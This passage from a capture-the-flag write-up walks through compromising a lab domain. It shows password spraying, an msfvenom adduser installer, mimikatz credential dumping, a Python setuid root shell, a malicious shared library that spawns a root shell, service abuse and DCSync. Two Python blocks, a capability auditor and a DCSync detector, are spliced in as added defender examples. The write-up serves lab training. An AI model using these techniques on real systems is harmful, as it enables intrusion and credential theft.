&lt;p&gt;Now, with this user, we can spray the credential across the entire domain and check where it has access. You can use &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;crackmapexec&lt;/code&gt; for that; however, by default it only verifies whether the credential is valid and whether it is a local administrator. To check for RDP access you need to pass the correct protocol/module to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;crackmapexec&lt;/code&gt; or use a different tool. One suggestion was to use &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;crowbar&lt;/code&gt;, for instance: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;crowbar -b rdp -s 192.168.111.0/24 -u sedalfino.freitas -c Summer2022&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;This will spray the credential across the entire domain and, with luck, you’ll get one hit.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scChal1-3.png&quot; alt=&quot;VPN Client Isolation &quot; /&gt;&lt;/p&gt;

&lt;p&gt;Looks like that user has RDP access to LAB-WIN6! Using a simple client such as Remmina you could connect to the machine and get the first flag:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scChal1-4.png&quot; alt=&quot;VPN Client Isolation &quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;flag{OneSmallFootInTheEnterprise}&lt;/code&gt;&lt;/p&gt;

&lt;h2 id=&quot;challenge---stairway-to-heaven&quot;&gt;Challenge - Stairway to Heaven!&lt;/h2&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Larapios Group states that they can completely compromise the machine and gain Administrator access through a misconfiguration!

Cement your access by replicating this and get your points!
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Now that you have a foothold on a machine, you can try to escalate privileges.
If you use a helper script such as PowerUp.ps1 or WinPEAS, you’ll notice that two registry keys are set that allow the installation of programs in an elevated context.
You can use msfvenom to create a malicious installer and abuse this to obtain administrative privileges!&lt;/p&gt;

&lt;p&gt;You can use payloads such as &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;msfvenom -p windows/adduser USER=cenas PASSWORD=P@ssw0rd132! -f msi -o file.msi&lt;/code&gt; to create the installer. Since this is an MSI and it will install something, Windows, with this configuration, will automatically run the installer in an elevated context. But since we injected that payload, a new user will be created.&lt;/p&gt;

&lt;p&gt;One problem was getting those helper scripts (WinPEAS or PowerUp) onto the machine, since no Internet connection was available. One interesting feature of RDP on Windows is the ability to redirect local folders or drives into the remote session. In the Remmina configuration you just need to specify the “Share folder” and it will be mounted as a remote volume:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scChal2.png&quot; alt=&quot;VPN Client Isolation &quot; /&gt;&lt;/p&gt;

&lt;p&gt;After running the installation and pwning the machine we can connect with the new user and get the privileged flag:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scChal2-1.png&quot; alt=&quot;VPN Client Isolation &quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;flag{wholeLegInTheEnterprise}&lt;/code&gt;&lt;/p&gt;

&lt;h2 id=&quot;other-os-are-people-2--shells-shells-shells&quot;&gt;Other OS Are People 2 &amp;amp; Shells, Shells, Shells&lt;/h2&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Larapios said there are some Linux machines loose in the environment and the System Administrator reuses their credentials 😩.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;There is more than one Linux OS server. Can you find it in the network and access it using your *repertoire* of pwned passwords?
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;But we are not done yet! When you compromise a Windows machine, one of the first things you do is dump secrets such as the memory of the LSASS process. That process holds hashes, and sometimes cleartext passwords, of users who have logged on to the machine and of services running on it.&lt;/p&gt;

&lt;p&gt;If you use mimikatz to dump these secrets you’ll get a new credential to use &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;bacano.do.it&lt;/code&gt;!&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scChal2-2.png&quot; alt=&quot;VPN Client Isolation &quot; /&gt;&lt;/p&gt;

&lt;p&gt;Following the same strategy we needed to scan the environment to see where those credentials are being used.&lt;/p&gt;

&lt;p&gt;One caveat is that this credential is used for SSH connections, not RDP/SMB ones. It is valid on the two Linux machines.&lt;/p&gt;

&lt;p&gt;Just for using that credential, you are greeted with two flags:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scChal3.png&quot; alt=&quot;VPN Client Isolation &quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;flag{pinguinsRPeople2}&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;flag{OneMore4TheRoad}&lt;/code&gt;&lt;/p&gt;

&lt;h2 id=&quot;challenge---captain-pwn&quot;&gt;Challenge - CAPtain Pwn!&lt;/h2&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;The System Administrator was having trouble getting scripts to run but found a way to always work!
Can you abuse the misconfiguration and pwn the machine?
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;After you get the easy flag you’ll need to compromise the machine.
To do that we can use another helper script, such as LinPEAS.
Among the plethora of information, you’ll notice a warning about a possible privilege escalation.&lt;/p&gt;

&lt;p&gt;The title of the challenge hints at CAP, as in Linux capabilities, and there are a lot of them to explore (see, for example, the &lt;a href=&quot;https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities&quot;&gt;hacktricks&lt;/a&gt; page on the subject).&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scChal4.png&quot; alt=&quot;VPN Client Isolation &quot; /&gt;&lt;/p&gt;

&lt;p&gt;We can see that the Python binary has the &lt;em&gt;capability&lt;/em&gt; to set the UID of the running process. This means we control which user the program runs as. A simple Python payload that changes the current user can be used to escalate privileges:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scChal4-1.png&quot; alt=&quot;VPN Client Isolation &quot; /&gt;&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;import os;
os.setuid(0);
os.system(&quot;/bin/bash&quot;);
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;flag{HelloCAPtain}&lt;/code&gt;&lt;/p&gt;

&lt;h2 id=&quot;challenge---so-cute&quot;&gt;Challenge - SO Cute!&lt;/h2&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Infrastructure logs show weird behavior on one binary left in the server but we couldn&apos;t discover how can we abuse it to render the server to its knees. Everything is patched so there will be a challenge.

Can you analyze the server and look for ways to overcome its security?
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Following the same principle you can run &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;linpeas&lt;/code&gt; in this environment to look for interesting files and privileges.&lt;/p&gt;

&lt;p&gt;Down the rabbit hole, you should see a strange binary that has the SETUID flag set.&lt;/p&gt;

&lt;p&gt;That bit makes the binary run with the privileges of its owner. Some setuid binaries are standard on a system; for instance, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ping&lt;/code&gt; or &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;unix_chkpwd&lt;/code&gt; can be executed by anyone even though by nature they require additional privileges.&lt;/p&gt;

&lt;p&gt;For that kind of binary, we should guarantee that there is no way for an outside party to inject code or change the execution flow.&lt;/p&gt;

&lt;p&gt;If we can manipulate the flow, we can impersonate the binary owner, in this case, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;root&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The binary &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;magician&lt;/code&gt; is not very common and does not belong to the standard &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;setuid&lt;/code&gt; binary list.&lt;/p&gt;
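&lt;p&gt;As an added defender-side example (not code from the original post or from the challenge), the following Python audit decodes the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;security.capability&lt;/code&gt; extended attribute in the layout the kernel stores it (revision 1, 2 and 3 formats, as in the kernel’s capability header) and reports regular files that are setuid-root outside an allowlist of standard binaries, or that carry cap_setuid/cap_setgid the way the Python binary above does. The allowlist, the sample xattr blob and the file names are constructed assumptions.&lt;/p&gt;

```python
import os
import stat

# Layout of the security.capability xattr (kernel capability header): a
# little-endian magic/flags word, then one (revision 1) or two (revision
# 2 and 3) pairs of permitted/inheritable 32-bit words.
VFS_CAP_REVISION_1 = 0x01000000
VFS_CAP_REVISION_2 = 0x02000000
VFS_CAP_REVISION_3 = 0x03000000
CAP_SETGID = 6
CAP_SETUID = 7

# Constructed allowlist of setuid binaries normally shipped by a distro.
STANDARD_SETUID = frozenset({
    "su", "sudo", "passwd", "chsh", "chfn", "gpasswd", "newgrp",
    "mount", "umount", "ping", "unix_chkpwd", "pkexec",
})

# Constructed sample: the xattr of a python3 binary carrying cap_setuid+ep
# (revision 2, effective flag set, capability bit 7 in the first word).
SAMPLE_CAP_BLOB = bytes.fromhex(
    "01000002"             # magic_etc: revision 2, VFS_CAP_FLAGS_EFFECTIVE
    "80000000" "00000000"  # data[0]: permitted = 1 shifted by 7, inheritable = 0
    "00000000" "00000000"  # data[1]: capability bits 32..63, all clear
)


def parse_vfs_cap(blob):
    """Decode a security.capability blob into (permitted, inheritable, effective)."""
    if 4 > len(blob):
        raise ValueError("capability xattr too short")
    magic_etc = int.from_bytes(blob[0:4], "little")
    revision = magic_etc - magic_etc % 0x1000000  # top byte is the revision
    effective = magic_etc % 2 == 1                 # lowest flag bit means +e
    if revision == VFS_CAP_REVISION_1:
        words = 1
    elif revision in (VFS_CAP_REVISION_2, VFS_CAP_REVISION_3):
        words = 2
    else:
        raise ValueError("unknown capability revision 0x%08x" % revision)
    if 4 + 8 * words > len(blob):
        raise ValueError("truncated capability data")
    permitted = 0
    inheritable = 0
    for i in range(words):
        off = 4 + 8 * i
        # word i holds capability bits 32*i .. 32*i+31
        permitted += int.from_bytes(blob[off:off + 4], "little") * 2 ** (32 * i)
        inheritable += int.from_bytes(blob[off + 4:off + 8], "little") * 2 ** (32 * i)
    return permitted, inheritable, effective


def has_cap(mask, cap):
    """True when capability number cap is set in the 64-bit mask."""
    return (mask // 2 ** cap) % 2 == 1


def classify(name, mode, owner_uid, cap_blob, allowlist=STANDARD_SETUID):
    """Pure policy check for one file; returns a list of findings (empty means clean)."""
    findings = []
    is_setuid = (mode // stat.S_ISUID) % 2 == 1
    if is_setuid and owner_uid == 0 and name not in allowlist:
        findings.append("%s: setuid-root binary outside the allowlist" % name)
    if cap_blob is not None:
        permitted, _inheritable, effective = parse_vfs_cap(cap_blob)
        suffix = "+ep" if effective else "+p"
        for cap_name, cap in (("cap_setuid", CAP_SETUID), ("cap_setgid", CAP_SETGID)):
            if has_cap(permitted, cap):
                findings.append("%s: file capability %s%s" % (name, cap_name, suffix))
    return findings


def audit_tree(root):
    """Walk a directory tree and collect findings for every regular file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            try:
                st = os.lstat(path)
                if not stat.S_ISREG(st.st_mode):
                    continue
                try:
                    blob = os.getxattr(path, "security.capability")
                except OSError:  # ENODATA: no file capabilities on this file
                    blob = None
                findings.extend(classify(fname, st.st_mode, st.st_uid, blob))
            except OSError:  # unreadable entry: skip it rather than abort
                continue
    return findings


if __name__ == "__main__":
    for line in audit_tree("/usr"):
        print(line)
```

Run as root (or with CAP_DAC_READ_SEARCH) to cover directories a normal user cannot list; a binary like &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;magician&lt;/code&gt; shows up as a setuid-root finding and the python3 interpreter as a cap_setuid finding.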

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/socutelinpeas.png&quot; alt=&quot;SETUID binary Linpeas&quot; /&gt;&lt;/p&gt;

&lt;p&gt;If you execute the binary without any arguments you should see a string &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Infosec Magic&lt;/code&gt;, definitely not standard.&lt;/p&gt;

&lt;p&gt;We can try and fiddle around with the binary or just open Ghidra and try to reverse it.&lt;/p&gt;

&lt;p&gt;I opted for a different strategy and used &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;strace&lt;/code&gt; to look at the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;system calls&lt;/code&gt; the application makes, to understand how I could abuse it.&lt;/p&gt;

&lt;p&gt;If you pass two arguments you can see that it tries to open some files (yes, you could also see this easily in Ghidra by reverse engineering the main function). You are then greeted with the message “Error Loading lib!”. This message is a hint about libraries, similar to DLLs on Windows. 
If you dig deeper you will see that it is trying to load a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.so&lt;/code&gt; file.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/stracesocute.png&quot; alt=&quot;Strace SoCute &quot; /&gt;&lt;/p&gt;

&lt;p&gt;Similarly to DLLs, these are libraries loaded into the program. If a program tries to load one from a folder you control, you can place a crafted library there that takes over the execution flow and inherits the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;setuid&lt;/code&gt; binary’s privileges.&lt;/p&gt;

&lt;p&gt;To do that you need to create a shared library like this:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;

int _init(){
        setgid(0);
        setuid(0);

        execve(&quot;/bin/sh&quot;, NULL, NULL);
        return 0;
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Take particular notice of the function name. It is not the standard &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;main&lt;/code&gt; function. If you use &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;main&lt;/code&gt; it will not run when the library is loaded; instead you use &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;_init&lt;/code&gt; as the entry point, since it gets called when the library is constructed, which is what gives you execution.&lt;/p&gt;

&lt;p&gt;To finish, you need to compile the code &lt;em&gt;as a library!&lt;/em&gt; Otherwise, the linker will complain that you don’t have the proper entry point.&lt;/p&gt;

&lt;p&gt;To do that you just simply use:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;gcc &amp;lt;file&amp;gt; -shared -o &amp;lt;name_of_the_compiled_file&amp;gt; -fPIC -nostartfiles
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Pass the compiled file to the binary and you’ll see that you are now impersonating root and the box is owned!&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/socutelibrary.png&quot; alt=&quot;VPN Client Isolation &quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;flag{YouAreSOwelcome}&lt;/code&gt;&lt;/p&gt;

&lt;h2 id=&quot;spread-your-hacks&quot;&gt;Spread your hacks&lt;/h2&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;You got in? Noice!
I heard they got a special machine for &quot;Important People&quot;, but they are not very security-focused and their automation is faulty. Can you access it?

&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Now you need to take a step back and reassess what you have. It is a good moment to look at the Active Directory and with the credentials that we have try to understand how the environment was built.&lt;/p&gt;

&lt;p&gt;There are several ways to achieve that depending on your preference.&lt;/p&gt;

&lt;p&gt;I am very fond of using old tools to achieve new objectives, for instance, I like to use &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ADExplorer&lt;/code&gt; from SysInternals tools to explore the Active Directory.&lt;/p&gt;

&lt;p&gt;I prefer this tool to avoid the fallacy of trusting too much in a tool such as &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;BloodHound&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/adexplorer.png&quot; alt=&quot;ADExplorer&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Don’t get me wrong, BloodHound is a very good tool to detect privilege escalation paths in the environment, although it can leave out some interesting vectors. For instance, you often want to go from a standard user to Domain Admin, but you might not need that: if a user can reset other people’s passwords, that is also a security problem, and if you don’t take your query seriously you will leave those problems unnoticed. There are sensitive groups far beyond Domain Admins.&lt;/p&gt;

&lt;p&gt;Perhaps you can see &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Bloodhound&lt;/code&gt; as a good way to start cleaning your Active Directory and later go deep with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ADExplorer&lt;/code&gt; to create additional rules to clean the environment.&lt;/p&gt;

&lt;p&gt;But I digress. Running ADExplorer we can examine almost all accounts. Looking carefully through all of them, we notice a small comment in the Active Directory description field:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/adexplorerdescription.png&quot; alt=&quot;AD Explorer Password Leak&quot; /&gt;&lt;/p&gt;

&lt;p&gt;And we got a new account compromised! We could take &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;crowbar&lt;/code&gt; or even &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;crackmapexec&lt;/code&gt; to scan the whole environment for RDP access and lo and behold we get access to the LAB-WIN7 machine.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/rdpspray.png&quot; alt=&quot;RDP Spray&quot; /&gt;&lt;/p&gt;

&lt;p&gt;After scanning the machine we can quickly obtain the new flag and a new README file that we will look at later.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/win7flag.png&quot; alt=&quot;LAB-WIN7 flag&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;flag{slowMovingRabbit}&lt;/code&gt;&lt;/p&gt;

&lt;h2 id=&quot;big-dollar-spender&quot;&gt;Big Dollar Spender&lt;/h2&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;You in? Nice! Can you pwn it? Maybe...

They installed some shady service and hammered things down to make it work. Maybe it can be exploited in your favour.

&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We need to push forward and try to escalate privileges on this machine. From the description, one can infer that this is related to running services. Using &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;PowerUp&lt;/code&gt; we scan for privesc opportunities and one comes up:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/win7privesc.png&quot; alt=&quot;LAB-WIN7 Privesc&quot; /&gt;&lt;/p&gt;

&lt;p&gt;One service &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Bajordas Champion of the World&lt;/code&gt; stands out. It is not a standard Windows service (obviously) and it has lax permissions such that a standard user can modify it.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/win7powerup.png&quot; alt=&quot;LAB-WIN7 Privesc&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We can invoke the abuse function and it will create a malicious binary to add a new administrator account that we can later use.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/win7serviceabuse.png&quot; alt=&quot;LAB-WIN7 Service Abuse&quot; /&gt;&lt;/p&gt;

&lt;p&gt;After that, we can start the service. It will report a failure, since the replacement binary exits instead of behaving like a service, but our payload runs successfully and we have an administrator account. We can collect the new flag and move along in the challenge!&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/win7adminflag.png&quot; alt=&quot;LAB-WIN7 Admin Flag&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;flag{GameON}&lt;/code&gt;&lt;/p&gt;

&lt;h2 id=&quot;congratulations-you-are-being-backed-up-do-not-resist&quot;&gt;Congratulations You Are Being Backed Up, Do Not Resist&lt;/h2&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;It seems Larapios Group achieved some level of persistence in a Management machine left in the environment but the normal compliance scans do not detect it?

It seems they are leaking information from the machine seamlessly, almost like a **backup**. I don&apos;t know, maybe it&apos;s Microsoft Active Directory black Magic.

Can you replicate the attack and gain access to the flag they left?
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We need to trace back and go to our second Windows machine (LAB-WIN7). There was a README file on the desktop with the text &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;to use the printer using the account &amp;gt; impressora with PrintSvcFTW!&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/printerpassword.png&quot; alt=&quot;Printer Account&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Well, we have an additional account. Now if we run BloodHound, or just spray the password against all the other machines, we get a new hit: a new folder to inspect!&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/impressoraScan.png&quot; alt=&quot;Account impressora spray &quot; /&gt;&lt;/p&gt;

&lt;p&gt;The file server LAB-SHARE01 has a hidden share called &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Admins$&lt;/code&gt; (similar to the standard &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Admin$&lt;/code&gt; share, but with an additional character so that it blends in) where you can find the following text:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Se algo falhar usa isto do arco da velha, assim os admins nem compliance descobre ;)

PanadosComPaoChouricoChouricao1337!
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;which translates to:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;If anything fails, use this one from arco da velha; that way neither the admins nor compliance will find out ;)

PanadosComPaoChouricoChouricao1337!
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/mgmtmsg.png&quot; alt=&quot;WIN-MGMT message&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Well, there is indeed an account named &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;arco.da.velha&lt;/code&gt;, and we can verify that the password is indeed correct, but it doesn’t give you access to other machines. Let’s hold off on this account for a bit longer.&lt;/p&gt;

&lt;p&gt;You might also find that the printer account allows you to browse certain files on the WIN-MGMT machine. That was an unintended consequence of the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Backup Operator&lt;/code&gt; permission. The intent was for people to impersonate the account, enable the privilege, and browse files to reach the flag &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;flag{ItsNotALeakItsASurpriseBackup}&lt;/code&gt;, which states that there is no Admin flag on the machine.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/flagitsnotaleak.png&quot; alt=&quot;flag it&apos;s not a leak&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;my-momma-said-i-could-by-anything-so-i-became-a-domain-controller&quot;&gt;My Momma Said I Could Be Anything, so I Became a Domain Controller&lt;/h2&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;It&apos;s OK, there are no weird domain admins in the group!
We are compliant, no one can access the domain controller. We are secure... or are we?
Larapios group can still dump all our environment, what is happening? 😱😨
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Running out of options, we look at the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;arco.da.velha&lt;/code&gt; account and at what permissions it holds. If you manage to check the permissions on the DC itself, you can observe that the account is able to perform a DCSync.&lt;/p&gt;

&lt;p&gt;DCSync is, in the simplest terms, the replication mechanism Domain Controllers use to synchronize with each other. This means we can use the account to pose as a Domain Controller and have everything replicated to us: all the user accounts, computer accounts, everything…&lt;/p&gt;
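&lt;p&gt;As an added detection-side example (not from the original post), this is how the DCSync described above surfaces in the Security log: a replication request is recorded as Windows Security Event ID 4662 on the Domain Controller, with the DS-Replication-Get-Changes control-access right GUIDs in the Properties field. The detector below parses constructed key=value event lines (a simplified form, not the real EVTX layout) and flags any replication request whose subject is not a known Domain Controller computer account; the event lines, the DC list and the non-replication GUID are constructed assumptions, the three replication GUIDs are the well-known ones.&lt;/p&gt;

```python
import re

# Well-known control-access right GUIDs that grant directory replication.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # AccessMask bit set when an extended (control) right is used

# Constructed: computer accounts of the legitimate Domain Controllers.
KNOWN_DCS = frozenset({"LAB-DC01$"})

# Constructed sample events in a simplified "key=value; key=value" form; the
# field names follow the 4662 event schema, the GUID in the third line is a
# made-up attribute GUID standing in for an ordinary attribute read.
SAMPLE_EVENTS = [
    "EventID=4662; SubjectUserName=LAB-DC01$; SubjectDomainName=BAJORDAS; "
    "AccessMask=0x100; Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662; SubjectUserName=arco.da.velha; SubjectDomainName=BAJORDAS; "
    "AccessMask=0x100; Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662; SubjectUserName=sedalfino.freitas; SubjectDomainName=BAJORDAS; "
    "AccessMask=0x10; Properties={aaaaaaaa-1111-2222-3333-444444444444}",
    "EventID=4624; SubjectUserName=impressora; SubjectDomainName=BAJORDAS; LogonType=3",
]

GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def parse_event(line):
    """Split one constructed 'key=value; key=value' line into a dict."""
    fields = {}
    for part in line.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def replication_rights(event):
    """Names of the replication rights present in the event's Properties field."""
    names = []
    for guid in GUID_RE.findall(event.get("Properties", "")):
        name = REPLICATION_GUIDS.get(guid.lower())
        if name:
            names.append(name)
    return names


def is_dcsync(event, known_dcs=KNOWN_DCS):
    """True when a principal that is not a known DC exercised a replication right."""
    if event.get("EventID") != "4662":
        return False
    try:
        mask = int(event.get("AccessMask", "0"), 16)
    except ValueError:
        return False
    if (mask // CONTROL_ACCESS) % 2 == 0:  # control-access bit not set
        return False
    if not replication_rights(event):
        return False
    return event.get("SubjectUserName", "") not in known_dcs


def detect(lines, known_dcs=KNOWN_DCS):
    """Return one alert string per suspicious replication request in lines."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        if is_dcsync(event, known_dcs):
            who = "%s\\%s" % (event.get("SubjectDomainName", "?"), event["SubjectUserName"])
            alerts.append("possible DCSync by %s (%s)" % (who, ", ".join(replication_rights(event))))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

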